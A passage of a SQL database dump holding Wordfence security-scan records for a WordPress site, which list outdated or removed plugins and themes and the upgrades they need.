rel=\"noopener noreferrer\">Get more information.</a>','a:19:{s:4:\"name\";s:12:\"Spam Captcha\";s:4:\"slug\";s:12:\"spam-captcha\";s:7:\"version\";s:5:\"1.4.2\";s:6:\"author\";s:41:\"<a href=\"http://www.sedlex.fr\">SedLex</a>\";s:14:\"author_profile\";s:37:\"https://profiles.wordpress.org/sedlex\";s:8:\"requires\";s:3:\"3.0\";s:6:\"tested\";s:6:\"4.5.24\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}s:11:\"num_ratings\";i:2;s:15:\"support_threads\";i:0;s:24:\"support_threads_resolved\";i:0;s:12:\"last_updated\";s:22:\"2016-04-19 12:39pm GMT\";s:8:\"homepage\";s:42:\"http://wordpress.org/plugins/spam-captcha/\";s:13:\"download_link\";s:55:\"https://downloads.wordpress.org/plugin/spam-captcha.zip\";s:11:\"dateUpdated\";s:14:\"April 19, 2016\";s:9:\"abandoned\";b:1;s:10:\"vulnerable\";b:0;s:5:\"wpURL\";s:42:\"https://wordpress.org/plugins/spam-captcha\";}'),(91,1624417148,1624417148,'new','wfPluginRemoved',100,'8624c0702828d1733c353ed4387016d0','8624c0702828d1733c353ed4387016d0','The Plugin \"DW Social Share\" has been removed from wordpress.org.','Plugins can be removed from wordpress.org for various reasons. This can include benign issues like a plugin author discontinuing development or moving the plugin distribution to their own site, but some might also be due to security issues. In any case, future updates may or may not be available, so it is worth investigating the cause and deciding whether to temporarily or permanently replace or remove the plugin. <a href=\"https://www.wordfence.com/help/?query=scan-result-plugin-removed\" target=\"_blank\" rel=\"noopener noreferrer\">Get more information.</a>','a:15:{s:4:\"Name\";s:15:\"DW Social Share\";s:9:\"PluginURI\";s:0:\"\";s:7:\"Version\";s:5:\"1.0.0\";s:11:\"Description\";s:165:\"This plugin enables sharing of your content via popular social networks. Easy &amp; configurable. <cite>By <a href=\"http://www.designwall.com\">DesignWall</a>.</cite>\";s:6:\"Author\";s:50:\"<a href=\"http://www.designwall.com\">DesignWall</a>\";s:9:\"AuthorURI\";s:25:\"http://www.designwall.com\";s:10:\"TextDomain\";s:15:\"dw-social-share\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:15:\"DW Social Share\";s:10:\"AuthorName\";s:10:\"DesignWall\";s:9:\"wpRemoved\";b:1;s:10:\"vulnerable\";b:0;}'),(178,1624620601,1624620601,'new','wfUpgrade',75,'f1c96582872687d1db7f31382acaa550','f1c96582872687d1db7f31382acaa550','Your WordPress version is out of date','WordPress version 5.7.2 is now available. Please upgrade immediately to get the latest security updates from WordPress.','a:2:{s:14:\"currentVersion\";s:5:\"5.6.4\";s:10:\"newVersion\";s:5:\"5.7.2\";}'),(179,1624620601,1624620601,'new','wfPluginUpgrade',50,'a1241ed772a47f64621527634db20a3b','a1241ed772a47f64621527634db20a3b','The Plugin \"Akismet Anti-Spam\" needs an upgrade (4.1.8 -> 4.1.9).','You need to upgrade \"Akismet Anti-Spam\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:17:\"Akismet Anti-Spam\";s:9:\"PluginURI\";s:20:\"https://akismet.com/\";s:7:\"Version\";s:5:\"4.1.8\";s:11:\"Description\";s:363:\"Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. It keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. <cite>By <a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>.</cite>\";s:6:\"Author\";s:66:\"<a href=\"https://automattic.com/wordpress-plugins/\">Automattic</a>\";s:9:\"AuthorURI\";s:41:\"https://automattic.com/wordpress-plugins/\";s:10:\"TextDomain\";s:7:\"akismet\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:52:\"<a href=\"https://akismet.com/\">Akismet Anti-Spam</a>\";s:10:\"AuthorName\";s:10:\"Automattic\";s:10:\"pluginFile\";s:85:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/akismet/akismet.php\";s:10:\"newVersion\";s:5:\"4.1.9\";s:4:\"slug\";s:7:\"akismet\";s:5:\"wpURL\";s:37:\"https://wordpress.org/plugins/akismet\";s:10:\"vulnerable\";b:0;}'),(180,1624620601,1624620601,'new','wfPluginUpgrade',50,'99a34c5612654f8a79016eef020d0c52','99a34c5612654f8a79016eef020d0c52','The Plugin \"All-in-One WP Migration\" needs an upgrade (7.37 -> 7.44).','You need to upgrade \"All-in-One WP Migration\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:23:\"All-in-One WP Migration\";s:9:\"PluginURI\";s:21:\"https://servmask.com/\";s:7:\"Version\";s:4:\"7.37\";s:11:\"Description\";s:156:\"Migration tool for all your blog data. Import or Export your blog content with a single click. <cite>By <a href=\"https://servmask.com/\">ServMask</a>.</cite>\";s:6:\"Author\";s:44:\"<a href=\"https://servmask.com/\">ServMask</a>\";s:9:\"AuthorURI\";s:21:\"https://servmask.com/\";s:10:\"TextDomain\";s:23:\"all-in-one-wp-migration\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:1;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:59:\"<a href=\"https://servmask.com/\">All-in-One WP Migration</a>\";s:10:\"AuthorName\";s:8:\"ServMask\";s:10:\"pluginFile\";s:117:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/all-in-one-wp-migration/all-in-one-wp-migration.php\";s:10:\"newVersion\";s:4:\"7.44\";s:4:\"slug\";s:23:\"all-in-one-wp-migration\";s:5:\"wpURL\";s:53:\"https://wordpress.org/plugins/all-in-one-wp-migration\";s:10:\"vulnerable\";b:0;}'),(182,1624620601,1624620601,'new','wfPluginUpgrade',100,'edb66b31c2290c16124e9f0b60101628','edb66b31c2290c16124e9f0b60101628','The Plugin \"Contact Form 7\" needs an upgrade (4.5 -> 5.4.1).','You need to upgrade \"Contact Form 7\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:14:\"Contact Form 7\";s:9:\"PluginURI\";s:24:\"http://contactform7.com/\";s:7:\"Version\";s:3:\"4.5\";s:11:\"Description\";s:133:\"Just another contact form plugin. Simple but flexible. <cite>By <a href=\"http://ideasilo.wordpress.com/\">Takayuki Miyoshi</a>.</cite>\";s:6:\"Author\";s:61:\"<a href=\"http://ideasilo.wordpress.com/\">Takayuki Miyoshi</a>\";s:9:\"AuthorURI\";s:30:\"http://ideasilo.wordpress.com/\";s:10:\"TextDomain\";s:14:\"contact-form-7\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:53:\"<a href=\"http://contactform7.com/\">Contact Form 7</a>\";s:10:\"AuthorName\";s:16:\"Takayuki Miyoshi\";s:10:\"pluginFile\";s:102:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/contact-form-7/wp-contact-form-7.php\";s:10:\"newVersion\";s:5:\"5.4.1\";s:4:\"slug\";s:14:\"contact-form-7\";s:5:\"wpURL\";s:44:\"https://wordpress.org/plugins/contact-form-7\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:73:\"https://wpvulndb.com/vulnerabilities/7391118e-eef5-4ff8-a8ea-f6b65f442c63\";}'),(183,1624620601,1624620601,'new','wfPluginUpgrade',50,'9185d402c8e6c4424668aaa951c7e0d0','9185d402c8e6c4424668aaa951c7e0d0','The Plugin \"Contact Form 7 Modules: Hidden Fields\" needs an upgrade (2.0 -> 2.0.2).','You need to upgrade \"Contact Form 7 Modules: Hidden Fields\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:37:\"Contact Form 7 Modules: Hidden Fields\";s:9:\"PluginURI\";s:45:\"https://katz.co/contact-form-7-hidden-fields/\";s:7:\"Version\";s:3:\"2.0\";s:11:\"Description\";s:141:\"Add hidden fields to the popular Contact Form 7 plugin. <cite>By <a href=\"http://www.katzwebservices.com\">Katz Web Services, Inc.</a>.</cite>\";s:6:\"Author\";s:68:\"<a href=\"http://www.katzwebservices.com\">Katz Web Services, Inc.</a>\";s:9:\"AuthorURI\";s:30:\"http://www.katzwebservices.com\";s:10:\"TextDomain\";s:11:\"cf7_modules\";s:10:\"DomainPath\";s:9:\"languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:97:\"<a href=\"https://katz.co/contact-form-7-hidden-fields/\">Contact Form 7 Modules: Hidden Fields</a>\";s:10:\"AuthorName\";s:23:\"Katz Web Services, Inc.\";s:10:\"pluginFile\";s:99:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/contact-form-7-modules/hidden.php\";s:10:\"newVersion\";s:5:\"2.0.2\";s:4:\"slug\";s:22:\"contact-form-7-modules\";s:5:\"wpURL\";s:52:\"https://wordpress.org/plugins/contact-form-7-modules\";s:10:\"vulnerable\";b:0;}'),(184,1624620601,1624620601,'new','wfPluginUpgrade',50,'fb8c8282d78eebd9f9587d6460f7128b','fb8c8282d78eebd9f9587d6460f7128b','The Plugin \"Contact Form 7 Modules: Send All Fields\" needs an upgrade (2.0 -> 2.0.2).','You need to upgrade \"Contact Form 7 Modules: Send All Fields\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:39:\"Contact Form 7 Modules: Send All Fields\";s:9:\"PluginURI\";s:45:\"https://katz.co/contact-form-7-hidden-fields/\";s:7:\"Version\";s:3:\"2.0\";s:11:\"Description\";s:179:\"Send all submitted fields in the message body using one simple tag: <code>[all-fields]</code> <cite>By <a href=\"http://www.katzwebservices.com\">Katz Web Services, Inc.</a>.</cite>\";s:6:\"Author\";s:68:\"<a href=\"http://www.katzwebservices.com\">Katz Web Services, Inc.</a>\";s:9:\"AuthorURI\";s:30:\"http://www.katzwebservices.com\";s:10:\"TextDomain\";s:11:\"cf7_modules\";s:10:\"DomainPath\";s:9:\"languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:99:\"<a href=\"https://katz.co/contact-form-7-hidden-fields/\">Contact Form 7 Modules: Send All Fields</a>\";s:10:\"AuthorName\";s:23:\"Katz Web Services, Inc.\";s:10:\"pluginFile\";s:108:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/contact-form-7-modules/send-all-fields.php\";s:10:\"newVersion\";s:5:\"2.0.2\";s:4:\"slug\";s:22:\"contact-form-7-modules\";s:5:\"wpURL\";s:52:\"https://wordpress.org/plugins/contact-form-7-modules\";s:10:\"vulnerable\";b:0;}'),(185,1624620601,1624620601,'new','wfPluginUpgrade',50,'9e204db570b8d8d2ae20de6e719a9c43','9e204db570b8d8d2ae20de6e719a9c43','The Plugin \"Hello Dolly\" needs an upgrade (1.6 -> 1.7.2).','You need to upgrade \"Hello Dolly\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:11:\"Hello Dolly\";s:9:\"PluginURI\";s:41:\"http://wordpress.org/plugins/hello-dolly/\";s:7:\"Version\";s:3:\"1.6\";s:11:\"Description\";s:342:\"This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from Hello, Dolly in the upper right of your admin screen on every page. <cite>By <a href=\"http://ma.tt/\">Matt Mullenweg</a>.</cite>\";s:6:\"Author\";s:42:\"<a href=\"http://ma.tt/\">Matt Mullenweg</a>\";s:9:\"AuthorURI\";s:13:\"http://ma.tt/\";s:10:\"TextDomain\";s:0:\"\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:67:\"<a href=\"http://wordpress.org/plugins/hello-dolly/\">Hello Dolly</a>\";s:10:\"AuthorName\";s:14:\"Matt Mullenweg\";s:10:\"pluginFile\";s:75:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/hello.php\";s:10:\"newVersion\";s:5:\"1.7.2\";s:4:\"slug\";s:11:\"hello-dolly\";s:5:\"wpURL\";s:41:\"https://wordpress.org/plugins/hello-dolly\";s:10:\"vulnerable\";b:0;}'),(186,1624620601,1624620601,'new','wfPluginUpgrade',50,'87a56b48fdccb1ee2b1930aa28d7d3a7','87a56b48fdccb1ee2b1930aa28d7d3a7','The Plugin \"Login LockDown\" needs an upgrade (v1.6.1 -> v1.8.1).','You need to upgrade \"Login LockDown\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:14:\"Login LockDown\";s:9:\"PluginURI\";s:32:\"http://www.bad-neighborhood.com/\";s:7:\"Version\";s:6:\"v1.6.1\";s:11:\"Description\";s:246:\"Adds some extra security to WordPress by restricting the rate at which failed logins can be re-attempted from a given IP range. Distributed through <a href=\"http://www.bad-neighborhood.com/\">Bad Neighborhood</a>. <cite>By Michael VanDeMar.</cite>\";s:6:\"Author\";s:16:\"Michael VanDeMar\";s:9:\"AuthorURI\";s:0:\"\";s:10:\"TextDomain\";s:14:\"login-lockdown\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:61:\"<a href=\"http://www.bad-neighborhood.com/\">Login LockDown</a>\";s:10:\"AuthorName\";s:16:\"Michael VanDeMar\";s:10:\"pluginFile\";s:98:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/login-lockdown/loginlockdown.php\";s:10:\"newVersion\";s:6:\"v1.8.1\";s:4:\"slug\";s:14:\"login-lockdown\";s:5:\"wpURL\";s:44:\"https://wordpress.org/plugins/login-lockdown\";s:10:\"vulnerable\";b:0;}'),(187,1624620601,1624620601,'new','wfPluginUpgrade',50,'81fe8bce49041f124e283e1b53863d10','81fe8bce49041f124e283e1b53863d10','The Plugin \"Universal Google Analytics\" needs an upgrade (1.2.5.1 -> 1.3.7).','You need to upgrade \"Universal Google Analytics\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:26:\"Universal Google Analytics\";s:9:\"PluginURI\";s:28:\"https://www.brontobytes.com/\";s:7:\"Version\";s:7:\"1.2.5.1\";s:11:\"Description\";s:146:\"Adds Google Analytics universal tracking code to the footer of your theme. <cite>By <a href=\"https://www.brontobytes.com/\">Brontobytes</a>.</cite>\";s:6:\"Author\";s:54:\"<a href=\"https://www.brontobytes.com/\">Brontobytes</a>\";s:9:\"AuthorURI\";s:28:\"https://www.brontobytes.com/\";s:10:\"TextDomain\";s:26:\"universal-google-analytics\";s:10:\"DomainPath\";s:0:\"\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:69:\"<a href=\"https://www.brontobytes.com/\">Universal Google Analytics</a>\";s:10:\"AuthorName\";s:11:\"Brontobytes\";s:10:\"pluginFile\";s:123:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/universal-google-analytics/universal-google-analytics.php\";s:10:\"newVersion\";s:5:\"1.3.7\";s:4:\"slug\";s:26:\"universal-google-analytics\";s:5:\"wpURL\";s:56:\"https://wordpress.org/plugins/universal-google-analytics\";s:10:\"vulnerable\";b:0;}'),(188,1624620601,1624620601,'new','wfPluginUpgrade',100,'5dd5dbf4bc97ad9f1ae11399f9053189','5dd5dbf4bc97ad9f1ae11399f9053189','The Plugin \"Unyson\" needs an upgrade (2.5.12 -> 2.7.24).','You need to upgrade \"Unyson\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:6:\"Unyson\";s:9:\"PluginURI\";s:17:\"http://unyson.io/\";s:7:\"Version\";s:6:\"2.5.12\";s:11:\"Description\";s:200:\"A free drag &amp; drop framework that comes with a bunch of built in extensions that will help you develop premium themes fast &amp; easy. <cite>By <a href=\"http://themefuse.com\">ThemeFuse</a>.</cite>\";s:6:\"Author\";s:44:\"<a href=\"http://themefuse.com\">ThemeFuse</a>\";s:9:\"AuthorURI\";s:20:\"http://themefuse.com\";s:10:\"TextDomain\";s:2:\"fw\";s:10:\"DomainPath\";s:20:\"/framework/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:38:\"<a href=\"http://unyson.io/\">Unyson</a>\";s:10:\"AuthorName\";s:9:\"ThemeFuse\";s:10:\"pluginFile\";s:83:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/unyson/unyson.php\";s:10:\"newVersion\";s:6:\"2.7.24\";s:4:\"slug\";s:6:\"unyson\";s:5:\"wpURL\";s:36:\"https://wordpress.org/plugins/unyson\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:73:\"https://wpvulndb.com/vulnerabilities/bb12460a-af03-4462-bd05-42248cd3dc0e\";}'),(189,1624620601,1624620601,'new','wfPluginUpgrade',50,'ff0cd9957e084fb67c2da85e1735d21f','ff0cd9957e084fb67c2da85e1735d21f','The Plugin \"WP Date Remover\" needs an upgrade (1.0.0 -> 1.1.3).','You need to upgrade \"WP Date Remover\" to the newest version to ensure you have any security fixes the developer has released.','a:18:{s:4:\"Name\";s:15:\"WP Date Remover\";s:9:\"PluginURI\";s:25:\"http://wpdateremover.com/\";s:7:\"Version\";s:5:\"1.0.0\";s:11:\"Description\";s:181:\"WP Date Remover allows you to quickly and easily remove the time and date from specific post categories. <cite>By <a href=\"http://selmamariudottir.com\">Selma Mariudottir</a>.</cite>\";s:6:\"Author\";s:59:\"<a href=\"http://selmamariudottir.com\">Selma Mariudottir</a>\";s:9:\"AuthorURI\";s:27:\"http://selmamariudottir.com\";s:10:\"TextDomain\";s:15:\"wp-date-remover\";s:10:\"DomainPath\";s:10:\"/languages\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:55:\"<a href=\"http://wpdateremover.com/\">WP Date Remover</a>\";s:10:\"AuthorName\";s:17:\"Selma Mariudottir\";s:10:\"pluginFile\";s:101:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/wp-date-remover/wp-date-remover.php\";s:10:\"newVersion\";s:5:\"1.1.3\";s:4:\"slug\";s:15:\"wp-date-remover\";s:5:\"wpURL\";s:45:\"https://wordpress.org/plugins/wp-date-remover\";s:10:\"vulnerable\";b:0;}'),(190,1624620601,1624620601,'new','wfPluginUpgrade',100,'930467ff32a685d55c16c68b1e06660f','930467ff32a685d55c16c68b1e06660f','The Plugin \"Yoast SEO\" needs an upgrade (3.5 -> 16.5).','You need to upgrade \"Yoast SEO\" to the newest version to ensure you have any security fixes the developer has released.','a:19:{s:4:\"Name\";s:9:\"Yoast SEO\";s:9:\"PluginURI\";s:112:\"https://yoast.com/wordpress/plugins/seo/#utm_source=wpadmin&#038;utm_medium=plugin&#038;utm_campaign=wpseoplugin\";s:7:\"Version\";s:3:\"3.5\";s:11:\"Description\";s:178:\"The first true all-in-one SEO solution for WordPress, including on-page content analysis, XML sitemaps and much more. <cite>By <a href=\"https://yoast.com/\">Team Yoast</a>.</cite>\";s:6:\"Author\";s:43:\"<a href=\"https://yoast.com/\">Team Yoast</a>\";s:9:\"AuthorURI\";s:18:\"https://yoast.com/\";s:10:\"TextDomain\";s:13:\"wordpress-seo\";s:10:\"DomainPath\";s:11:\"/languages/\";s:7:\"Network\";b:0;s:10:\"RequiresWP\";s:0:\"\";s:11:\"RequiresPHP\";s:0:\"\";s:5:\"Title\";s:136:\"<a href=\"https://yoast.com/wordpress/plugins/seo/#utm_source=wpadmin&#038;utm_medium=plugin&#038;utm_campaign=wpseoplugin\">Yoast SEO</a>\";s:10:\"AuthorName\";s:10:\"Team Yoast\";s:10:\"pluginFile\";s:90:\"/home/yorkshirecricketboard.org.uk/public_html/wp-content/plugins/wordpress-seo/wp-seo.php\";s:10:\"newVersion\";s:4:\"16.5\";s:4:\"slug\";s:13:\"wordpress-seo\";s:5:\"wpURL\";s:43:\"https://wordpress.org/plugins/wordpress-seo\";s:10:\"vulnerable\";b:1;s:17:\"vulnerabilityLink\";s:73:\"https://wpvulndb.com/vulnerabilities/41e0aa47-f2f6-4f64-a95e-ed5c884bfe9e\";}'),(191,1624620601,1624620601,'new','wfThemeUpgrade',50,'55cd8beb0a157610acd23c03c62c8c55','55cd8beb0a157610acd23c03c62c8c55','The Theme \"Accelerate\" needs an upgrade (1.2.6 -> 1.4.9).','You need to upgrade \"Accelerate\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.4.9\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/accelerate.1.4.9.zip\";s:3:\"URL\";s:40:\"https://wordpress.org/themes/accelerate/\";s:4:\"Name\";s:10:\"Accelerate\";s:4:\"name\";s:10:\"Accelerate\";s:7:\"version\";s:5:\"1.2.6\";s:10:\"vulnerable\";b:0;}'),(192,1624620601,1624620601,'new','wfThemeUpgrade',50,'b5cd24e96e2e27b4fc84f3aa5236e9bf','b5cd24e96e2e27b4fc84f3aa5236e9bf','The Theme \"Alpha Store\" needs an upgrade (1.2.7 -> 1.4.3).','You need to upgrade \"Alpha Store\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.4.3\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/alpha-store.1.4.3.zip\";s:3:\"URL\";s:41:\"https://wordpress.org/themes/alpha-store/\";s:4:\"Name\";s:11:\"Alpha Store\";s:4:\"name\";s:11:\"Alpha Store\";s:7:\"version\";s:5:\"1.2.7\";s:10:\"vulnerable\";b:0;}'),(193,1624620601,1624620601,'new','wfThemeUpgrade',50,'5c1719fb5f48f44258936dd1921e90d8','5c1719fb5f48f44258936dd1921e90d8','The Theme \"Aqueduct\" needs an upgrade (2.0.2 -> 2.0.3).','You need to upgrade \"Aqueduct\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.0.3\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/aqueduct.2.0.3.zip\";s:3:\"URL\";s:38:\"https://wordpress.org/themes/aqueduct/\";s:4:\"Name\";s:8:\"Aqueduct\";s:4:\"name\";s:8:\"Aqueduct\";s:7:\"version\";s:5:\"2.0.2\";s:10:\"vulnerable\";b:0;}'),(194,1624620601,1624620601,'new','wfThemeUpgrade',50,'385f51533f7f4caa4163013fed21d184','385f51533f7f4caa4163013fed21d184','The Theme \"Barletta\" needs an upgrade (1.1.1 -> 1.1.7).','You need to upgrade \"Barletta\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.1.7\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/barletta.1.1.7.zip\";s:3:\"URL\";s:38:\"https://wordpress.org/themes/barletta/\";s:4:\"Name\";s:8:\"Barletta\";s:4:\"name\";s:8:\"Barletta\";s:7:\"version\";s:5:\"1.1.1\";s:10:\"vulnerable\";b:0;}'),(195,1624620601,1624620601,'new','wfThemeUpgrade',50,'2c9b0e5de545065dafa6f71d5825b177','2c9b0e5de545065dafa6f71d5825b177','The Theme \"Clean Magazine\" needs an upgrade (1.5.1 -> 1.7.4).','You need to upgrade \"Clean Magazine\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.7.4\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/theme/clean-magazine.1.7.4.zip\";s:3:\"URL\";s:44:\"https://wordpress.org/themes/clean-magazine/\";s:4:\"Name\";s:14:\"Clean Magazine\";s:4:\"name\";s:14:\"Clean Magazine\";s:7:\"version\";s:5:\"1.5.1\";s:10:\"vulnerable\";b:0;}'),(196,1624620601,1624620601,'new','wfThemeUpgrade',50,'e1080a2329359ec9290ae0c6a7797e3a','e1080a2329359ec9290ae0c6a7797e3a','The Theme \"Fabulous Fluid\" needs an upgrade (1.2 -> 1.9).','You need to upgrade \"Fabulous Fluid\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.9\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/fabulous-fluid.1.9.zip\";s:3:\"URL\";s:44:\"https://wordpress.org/themes/fabulous-fluid/\";s:4:\"Name\";s:14:\"Fabulous Fluid\";s:4:\"name\";s:14:\"Fabulous Fluid\";s:7:\"version\";s:3:\"1.2\";s:10:\"vulnerable\";b:0;}'),(197,1624620601,1624620601,'new','wfThemeUpgrade',50,'1c6755c111034b50a9de9596de1d89e3','1c6755c111034b50a9de9596de1d89e3','The Theme \"Fluida\" needs an upgrade (1.2.4 -> 1.8.6.2).','You need to upgrade \"Fluida\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:7:\"1.8.6.2\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/fluida.1.8.6.2.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/fluida/\";s:4:\"Name\";s:6:\"Fluida\";s:4:\"name\";s:6:\"Fluida\";s:7:\"version\";s:5:\"1.2.4\";s:10:\"vulnerable\";b:0;}'),(198,1624620601,1624620601,'new','wfThemeUpgrade',100,'5c5bb585e591870f51f39ccf0880142c','5c5bb585e591870f51f39ccf0880142c','The Theme \"Hueman\" needs an upgrade (3.2.10 -> 3.7.8).','You need to upgrade \"Hueman\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"3.7.8\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/hueman.3.7.8.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/hueman/\";s:4:\"Name\";s:6:\"Hueman\";s:4:\"name\";s:6:\"Hueman\";s:7:\"version\";s:6:\"3.2.10\";s:10:\"vulnerable\";b:1;}'),(199,1624620601,1624620601,'new','wfThemeUpgrade',50,'f82a2d91b3a671b587cba7fa1391a759','f82a2d91b3a671b587cba7fa1391a759','The Theme \"Illdy\" needs an upgrade (1.0.35 -> 2.1.9).','You need to upgrade \"Illdy\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.1.9\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/illdy.2.1.9.zip\";s:3:\"URL\";s:35:\"https://wordpress.org/themes/illdy/\";s:4:\"Name\";s:5:\"Illdy\";s:4:\"name\";s:5:\"Illdy\";s:7:\"version\";s:6:\"1.0.35\";s:10:\"vulnerable\";b:0;}'),(200,1624620601,1624620601,'new','wfThemeUpgrade',50,'9f46a47e42aa24d90af4f28c090a6c96','9f46a47e42aa24d90af4f28c090a6c96','The Theme \"Lightly\" needs an upgrade (1.26 -> 1.29).','You need to upgrade \"Lightly\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:4:\"1.29\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/lightly.1.29.zip\";s:3:\"URL\";s:37:\"https://wordpress.org/themes/lightly/\";s:4:\"Name\";s:7:\"Lightly\";s:4:\"name\";s:7:\"Lightly\";s:7:\"version\";s:4:\"1.26\";s:10:\"vulnerable\";b:0;}'),(201,1624620601,1624620601,'new','wfThemeUpgrade',50,'77ec3ec13c3838eda82fb37ca780c2d0','77ec3ec13c3838eda82fb37ca780c2d0','The Theme \"MH Magazine lite\" needs an upgrade (2.5.5 -> 2.9.0).','You need to upgrade \"MH Magazine lite\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.9.0\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/theme/mh-magazine-lite.2.9.0.zip\";s:3:\"URL\";s:46:\"https://wordpress.org/themes/mh-magazine-lite/\";s:4:\"Name\";s:16:\"MH Magazine lite\";s:4:\"name\";s:16:\"MH Magazine lite\";s:7:\"version\";s:5:\"2.5.5\";s:10:\"vulnerable\";b:0;}'),(202,1624620601,1624620601,'new','wfThemeUpgrade',50,'5562faef1191bf216a7715366e7155db','5562faef1191bf216a7715366e7155db','The Theme \"Morfeu\" needs an upgrade (1.1.3 -> 1.1.4).','You need to upgrade \"Morfeu\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.1.4\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/morfeu.1.1.4.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/morfeu/\";s:4:\"Name\";s:6:\"Morfeu\";s:4:\"name\";s:6:\"Morfeu\";s:7:\"version\";s:5:\"1.1.3\";s:10:\"vulnerable\";b:0;}'),(203,1624620601,1624620601,'new','wfThemeUpgrade',50,'05d77ae020f8a29d5854f3ad5680d248','05d77ae020f8a29d5854f3ad5680d248','The Theme \"Nirvana\" needs an upgrade (1.3.2 -> 1.5.2).','You need to upgrade \"Nirvana\" to the newest version to ensure you have any security fixes the developer has 